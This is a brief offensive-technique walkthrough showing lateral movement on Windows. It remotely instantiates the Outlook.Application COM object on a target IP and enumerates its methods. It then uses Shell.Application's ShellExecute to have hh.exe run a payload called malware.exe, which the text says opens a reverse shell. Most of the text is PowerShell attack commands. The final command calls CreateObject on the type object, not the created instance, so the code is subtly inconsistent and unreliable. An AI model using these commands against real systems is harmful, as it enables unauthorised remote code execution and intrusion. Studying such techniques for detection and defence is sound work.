Using LOLBins via COM Objects for Reverse Shell
A COM object is created remotely on the target machine (192.168.1.5) using the Outlook.Application ProgID. This technique demonstrates remote instantiation of a COM object over the network.
$com = [Type]::GetTypeFromProgID('Outlook.Application', '192.168.1.5')
$object = [System.Activator]::CreateInstance($com)
This command lists all methods containing “Create” in their names within the instantiated COM object. It helps identify potential method calls for further exploitation.
$object | Get-Member -Name "*Create*"
This leads to lateral movement , as the executed binary contains a reverse shell , allowing the attacker to gain remote access to the compromised system.
$com.CreateObject("Shell.Application").ShellExecute("C:\Windows\SysWOW64\hh.exe", "C:\Users\malefic\Desktop\malware.exe", "", "", 1)
Code execution is achieved using a Living off the Land Binary (LOLBins) approach. The Shell.Application COM object is used to invoke hh.exe, which then executes a malicious payload (malware.exe).